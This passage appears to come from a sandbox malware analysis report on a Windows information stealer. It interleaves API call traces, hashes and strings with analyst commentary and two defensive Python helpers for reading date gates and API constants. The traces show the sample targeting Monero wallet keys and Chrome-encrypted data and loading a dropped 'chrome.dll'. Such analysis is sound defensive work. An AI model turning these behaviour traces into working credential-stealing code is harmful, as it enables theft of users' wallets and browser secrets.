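    deadline = parse_deadline(deadline_text)
    if deadline is None:
        return False   # unparsable string: treated as "no deadline" (assumption)
    return systemtime_to_filetime(*now) > systemtime_to_filetime(*deadline)


if __name__ == "__main__":
    today = datetime.now(timezone.utc)
    print(is_past_deadline((today.year, today.month, today.day), "2024-10-31"))
```

When a date gate like this exists, a sandbox whose clock is set after the embedded date will see the sample exit immediately, which is a reason to re-run with the clock set earlier before concluding that a sample is inert.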
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7FC7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7FCE
                            • RegOpenKeyExA.ADVAPI32(80000002,00D3C470,00000000,00020119,?), ref: 000E7FEE
                            • RegQueryValueExA.ADVAPI32(?,00D4D6E0,00000000,00000000,000000FF,000000FF), ref: 000E800F
                            • RegCloseKey.ADVAPI32(?), ref: 000E8022
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 21f4f40545db5c41566ea742f5b2727365245980eb9c212136bbe4bff5eea887
                            • Instruction ID: 9badedca68cbcd46a3add7fb40e91136a86663c065da701f7b83cab2895d89c9
                            • Opcode Fuzzy Hash: 21f4f40545db5c41566ea742f5b2727365245980eb9c212136bbe4bff5eea887
                            • Instruction Fuzzy Hash: 74119EB2A44209EFD710CF85DD8AFBFBBBCEB45B10F104219F615A7280D77958008BA1
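The argument lists in these entries are raw hex, so the useful facts are easy to miss. RegOpenKeyExA(80000002, ..., 00020119) opens HKEY_LOCAL_MACHINE with KEY_READ|KEY_WOW64_64KEY, that is, this 32-bit process (the SysWOW64 PowerShell path earlier on this page confirms the WOW64 context) explicitly asks for the 64-bit registry view; CreateFileA(..., 80000000, 00000001, ..., 00000003, ...) in the file-reading entry above is GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING; LocalAlloc(00000040) is LPTR; and the SHGetFolderPathA(..., 0000001C, ...) subcall resolves CSIDL_LOCAL_APPDATA. The following Python is an added example of mine, not part of the Joe Sandbox report or its IDA plugin: it parses API lines in this report's format and annotates those constants. The sample input is copied from the lines above plus one argument-less wsprintfA line; the constant values are the ones in the Windows SDK headers.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

# Constructed input: API lines in the exact format of the function entries
# on this page (copied from the CreateFileA, LocalAlloc, RegOpenKeyExA and
# SHGetFolderPathA lines above, plus one argument-less wsprintfA line).
SAMPLE_LINES = """
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
• LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
• RegOpenKeyExA.ADVAPI32(80000002,00D3C470,00000000,00020119,?), ref: 000E7FEE
  • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
• wsprintfA.USER32 ref: 000E47F6
"""

# One report line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(args), ref: ADDR. Arguments the plugin could not resolve are "?".
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Win32 constants, values from the Windows SDK headers.
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ|KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY
KEY_BITS = [(0x20000, "STANDARD_RIGHTS_READ"), (0x1, "KEY_QUERY_VALUE"),
            (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
            (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"),
            (0x20, "KEY_CREATE_LINK"), (0x100, "KEY_WOW64_64KEY"),
            (0x200, "KEY_WOW64_32KEY")]
GENERIC_BITS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE_BITS = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}


def _flags(table, value: int) -> str:
    """Render a bitmask as NAME|NAME, keeping any unknown bits as hex."""
    names = [name for bit, name in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def decode_sam(value: int) -> str:
    """samDesired of RegOpenKeyExA: collapse KEY_READ, then list the extra bits."""
    parts = []
    if value & KEY_READ == KEY_READ:
        parts.append("KEY_READ")
        value &= ~KEY_READ
    if value:
        parts.append(_flags(KEY_BITS, value))
    return "|".join(parts)


def decode_lmem(value: int) -> str:
    """uFlags of LocalAlloc; 0x40 is LPTR, i.e. LMEM_FIXED|LMEM_ZEROINIT."""
    names = ["LMEM_MOVEABLE" if value & 0x2 else "LMEM_FIXED"]
    if value & 0x40:
        names.append("LMEM_ZEROINIT")
    return "|".join(names)


# API name -> {argument index: decoder}; only the arguments worth reading.
DECODERS: Dict[str, Dict[int, Callable[[int], str]]] = {
    "RegOpenKeyExA": {0: lambda v: HKEY.get(v, hex(v)), 3: decode_sam},
    "RegOpenKeyExW": {0: lambda v: HKEY.get(v, hex(v)), 3: decode_sam},
    "CreateFileA": {1: lambda v: _flags(GENERIC_BITS, v),
                    2: lambda v: _flags(SHARE_BITS, v),
                    4: lambda v: DISPOSITION.get(v, hex(v))},
    "LocalAlloc": {0: decode_lmem},
    "SHGetFolderPathA": {1: lambda v: CSIDL.get(v, hex(v))},
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: List[str]
    subcall: Optional[str]
    decoded: Dict[int, str] = field(default_factory=dict)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report API lines and annotate the constants the tables cover."""
    calls = []
    for m in LINE_RE.finditer(text):
        raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        call = ApiCall(m.group("api"), m.group("mod"), m.group("ref"), raw, m.group("sub"))
        for idx, decode in DECODERS.get(call.api, {}).items():
            if idx < len(raw) and raw[idx] not in ("?", ""):
                call.decoded[idx] = decode(int(raw[idx], 16))
        calls.append(call)
    return calls


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_LINES):
        print(c.api, c.ref, c.decoded)
```

The KEY_WOW64_64KEY bit is the detail worth keeping: a 32-bit stealer that reads HKLM through the 64-bit view is reaching past registry redirection, so the value it queries lives under the native path, not under Wow6432Node.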
                            APIs
                            • StrStrA.SHLWAPI(00D4E308,00000000,00000000,?,000D9F71,00000000,00D4E308,00000000), ref: 000E93FC
                            • lstrcpyn.KERNEL32(003A7580,00D4E308,00D4E308,?,000D9F71,00000000,00D4E308), ref: 000E9420
                            • lstrlen.KERNEL32(00000000,?,000D9F71,00000000,00D4E308), ref: 000E9437
                            • wsprintfA.USER32 ref: 000E9457
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 7bd7f695d60be5eb7fa26cbe311d12747d7412240d3925dbdd8766555f9463c8
                            • Instruction ID: d76166745d6f872df72dd4eec036cfb66b7139f483ed5bb16be30c1319192388
                            • Opcode Fuzzy Hash: 7bd7f695d60be5eb7fa26cbe311d12747d7412240d3925dbdd8766555f9463c8
                            • Instruction Fuzzy Hash: 4C01DE7560410CFFCB05DFA8CD94EAE7BB8EB4A344F108648F9099B245D731AA41DB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                            • RegCloseKey.ADVAPI32(?), ref: 000D12FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: bcef2c6b33a632b1c6eb2208175bc130abb4869551cba9b735dec113f80ac55c
                            • Instruction ID: 614ebb7352214466d0fb7ea5050d5bda013afb60a14eb98a00b44b575e92b9de
                            • Opcode Fuzzy Hash: bcef2c6b33a632b1c6eb2208175bc130abb4869551cba9b735dec113f80ac55c
                            • Instruction Fuzzy Hash: B901CD79A44209BFDB14DFD4DC89FAE77BCEB49701F104595FA0597280DA759A008B90
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 000E6903
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E69C6
                            • ExitProcess.KERNEL32 ref: 000E69F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: b830c863e74d09064bd4ba67458805d7bce53187a3af0a6401dd576247f19800
                            • Instruction ID: b74ab831432eb8c010c6e48b0800f9d156d9d86e4ebb58d217ebd88310110f3d
                            • Opcode Fuzzy Hash: b830c863e74d09064bd4ba67458805d7bce53187a3af0a6401dd576247f19800
                            • Instruction Fuzzy Hash: 603129B1E01258AFDB15EB91DC92FDEB778AF08300F404189F20976192DF706A48CF69
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0E10,00000000,?), ref: 000E89BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E89C6
                            • wsprintfA.USER32 ref: 000E89E0
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 1a7298f7a4d969f584127dd3e32f23545a7e5ad2d175b7c50a027cf4cd82b6e6
                            • Instruction ID: 0a89a938579d91050f6a09f9a4c181b10b5e66199e9bf89ce93e4de765c6264a
                            • Opcode Fuzzy Hash: 1a7298f7a4d969f584127dd3e32f23545a7e5ad2d175b7c50a027cf4cd82b6e6
                            • Instruction Fuzzy Hash: 882130B1A44204AFDB00DF94DD85FAEBBB8FB49710F104519F615B7280C77569008BA1
                            APIs
                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 000DA098
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                            • API String ID: 1029625771-1545816527
                            • Opcode ID: 7ae4bcc1650d47694755ef07b700d12c65980b197710a26f8aee34bc59739633
                            • Instruction ID: 864a88c7c41d45343180c4b117571b6ed0c54c9fdbfc89c426d66ab28b0a8209
                            • Opcode Fuzzy Hash: 7ae4bcc1650d47694755ef07b700d12c65980b197710a26f8aee34bc59739633
                            • Instruction Fuzzy Hash: 75F03A7474D318EFD712EB66EC88B6636ADE347304F00051AE209972A0C7B998C8DB67
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E96AE,00000000), ref: 000E8EEB
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E8EF2
                            • wsprintfW.USER32 ref: 000E8F08
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: b656e6ee35ee04746013cc869cec30e63ab03be361a4f3926560e60207589a5f
                            • Instruction ID: f6761917ad6d0dc1a1b9e5055f4cdd0b98218726e06cd9ee7bf1e00834f5df4d
                            • Opcode Fuzzy Hash: b656e6ee35ee04746013cc869cec30e63ab03be361a4f3926560e60207589a5f
                            • Instruction Fuzzy Hash: 2BE08CB1A48308BBDB10CB94DD4AE6D77BCEB46301F000194FE0987340DA719E009B91
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DAA11
                            • lstrlen.KERNEL32(00000000,00000000), ref: 000DAB2F
                            • lstrlen.KERNEL32(00000000), ref: 000DADEC
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • DeleteFileA.KERNEL32(00000000), ref: 000DAE73
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 711bf826c0b73db3860c267651f660d8df2dbe79ad06915c9036f7a9da5e1dca
                            • Instruction ID: 8e3ad3e751b81cc111d8381cfa969b86134b0951d5747bc6f168cd4a02d29986
                            • Opcode Fuzzy Hash: 711bf826c0b73db3860c267651f660d8df2dbe79ad06915c9036f7a9da5e1dca
                            • Instruction Fuzzy Hash: 46E1BC72E101489ECB15EBA5DDA2EEE7339AF29300F518559F11676093EF307A48CB72
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD581
                            • lstrlen.KERNEL32(00000000), ref: 000DD798
                            • lstrlen.KERNEL32(00000000), ref: 000DD7AC
                            • DeleteFileA.KERNEL32(00000000), ref: 000DD82B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: aa1253d8da45ad44111624f06bbce17d8e939203037090ee22bf1719a05434f6
                            • Instruction ID: 2e41c44c5976bf4e0e1d55b1acb7bd8c59783eccab45157ab7975a257834db16
                            • Opcode Fuzzy Hash: aa1253d8da45ad44111624f06bbce17d8e939203037090ee22bf1719a05434f6
                            • Instruction Fuzzy Hash: DA91DE72E101489FCB15EBA5DCA2DEE7339AF69300F518569F11676193EF307A08CB62
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD901
                            • lstrlen.KERNEL32(00000000), ref: 000DDA9F
                            • lstrlen.KERNEL32(00000000), ref: 000DDAB3
                            • DeleteFileA.KERNEL32(00000000), ref: 000DDB32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 769c0e9308beb295964d62ad02c139cd7d86559ce56841f53bfb3a18535a4615
                            • Instruction ID: a6fc2860e413f21d2f43767ca38dd2202b9c5629daf0c1dd50609006613a3b92
                            • Opcode Fuzzy Hash: 769c0e9308beb295964d62ad02c139cd7d86559ce56841f53bfb3a18535a4615
                            • Instruction Fuzzy Hash: 5081FB72E101489FCB04EBA5DCA6DEE7339AF6A300F514569F10676193EF347A08CB62
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction ID: cae17b0ca7811790bd753730445a8c6e9d65830b675b6eeed7eced86d44bbad6
                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction Fuzzy Hash: 0051C072900206EFEB2A8F94C851BBA77A4FF15311F24453DFC158A6A1E731ED4ADB90
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000DA664
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: @$v10$v20
                            • API String ID: 2746078483-278772428
                            • Opcode ID: 4d9c94d7e454f32f6185b67f728db170432acebe574398591ccd836b62d3c682
                            • Instruction ID: 19f5684fceac267d9e93825fc532bf1b4d52b20719046bb2b3f547376003b6a5
                            • Opcode Fuzzy Hash: 4d9c94d7e454f32f6185b67f728db170432acebe574398591ccd836b62d3c682
                            • Instruction Fuzzy Hash: 42513C70B1024CEFDB24DFA4CD96BED7776AF45304F008118EA0A6F696DB706A05CB62
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
